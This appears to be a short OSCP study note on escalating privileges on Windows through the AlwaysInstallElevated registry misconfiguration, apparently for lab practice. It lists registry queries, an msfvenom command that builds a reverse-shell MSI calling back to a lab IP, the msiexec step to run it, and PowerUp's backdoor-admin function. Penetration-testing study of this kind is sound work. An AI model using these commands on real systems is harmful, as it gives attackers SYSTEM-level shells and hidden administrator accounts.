// notes/ PrivEsc — Windows
🪟
Registy Alwaysinstallelevated
AlwaysInstallElevated is a misconfiguration that installs all msi packages as system. Wheels spinning?
#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/registy_alwaysinstallelevated ↗AlwaysInstallElevated
Overview
AlwaysInstallElevated is a misconfiguration that installs all msi packages as system. Wheels spinning?
Elevation via AlwaysInstallElevated
Query the registry for the misconfiguration
<pre class="language-powerquery"><code class="lang-powerquery"><strong>reg query HKLM\Software\Policies\Microsoft\Windows\Installer </strong>reg query HKCU\Software\Policies\Microsoft\Windows\Installer </code></pre> <figure><img src="/files/Yqr48vitkLTAvClMooHM" alt=""><figcaption><p>The machine is vulnerable if both values are set to 1</p></figcaption></figure>Create a malicious msi file
<pre class="language-bash"><code class="lang-bash"><strong>msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1338 -f msi -o rev.msi </strong></code></pre>Pop a shell
powerquery
01msiexec /i rev.msiQuick Win
You can get a quick win by using the Write-UserAddMSI function from PowerUp.
This function will add a backdoor user to the Local Administrators Group
{% hint style="info" %} An RDP sessions is required for this {% endhint %}
<figure><img src="/files/upDZgqgrz5MaYy9LsRIH" alt=""><figcaption></figcaption></figure> <figure><img src="/files/FUDtpTbTaNzonCzRNcrA" alt=""><figcaption></figcaption></figure>